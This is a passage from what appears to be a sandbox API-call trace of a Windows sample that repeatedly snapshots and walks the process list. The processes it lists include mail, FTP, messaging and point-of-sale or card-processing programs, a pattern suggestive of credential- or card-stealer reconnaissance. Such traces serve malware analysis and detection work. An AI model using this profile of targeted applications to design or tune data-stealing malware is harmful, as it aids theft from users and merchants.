lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0172.212] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0172.216] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0172.218] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0172.221] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0172.223] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0172.230] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0172.233] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0172.235] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0172.239] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0172.242] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0172.246] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0172.287] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0172.290] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0172.294] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0172.297] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0172.299] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0172.302] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0172.305] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0172.311] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0172.314] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0172.316] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0172.319] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0172.322] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0172.324] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0172.327] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0172.329] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0172.332] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0172.334] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0172.337] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0172.340] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0172.343] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0172.345] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0172.352] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0172.354] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0172.357] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0172.359] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0172.362] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0172.364] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0172.367] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0172.369] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0172.373] Process32Next (in: hSnapshot=0x1ce4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0172.376] CloseHandle (hObject=0x1ce4) returned 1 [0172.376] Sleep (dwMilliseconds=0x64) [0172.498] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd8 [0172.515] Process32First (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.517] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0172.519] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0172.522] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0172.525] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0172.527] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0172.528] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0172.530] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0172.533] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0172.576] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.579] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.581] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0172.583] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.586] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.588] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.590] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.592] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.594] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.596] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.598] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0172.600] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0172.603] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.605] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0172.607] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.609] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0172.611] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0172.670] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0172.672] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0172.674] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0172.676] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0172.678] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.680] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0172.681] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0172.683] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0172.685] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0172.686] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.688] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0172.689] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0172.691] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0172.693] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0172.695] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0172.697] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, 